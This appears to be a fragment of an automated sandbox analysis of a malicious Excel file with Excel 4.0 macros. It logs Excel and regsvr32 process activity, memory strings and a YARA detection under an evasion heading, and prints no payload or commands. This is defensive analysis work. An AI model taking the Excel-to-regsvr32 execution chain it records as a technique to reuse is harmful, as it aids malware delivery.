Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: EXCEL.EXE, 00000001.00000002.751424491.000000000D5F6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW(?7
Source: EXCEL.EXE, 00000001.00000003.604266706.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619683084.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622661724.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753480507.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599726900.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565438723.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618445946.000000000F35B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: EXCEL.EXE, 00000001.00000003.604266706.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619683084.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622661724.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753480507.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599726900.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565438723.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618445946.000000000F35B000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW,

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmp Binary or memory string: Progman
Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs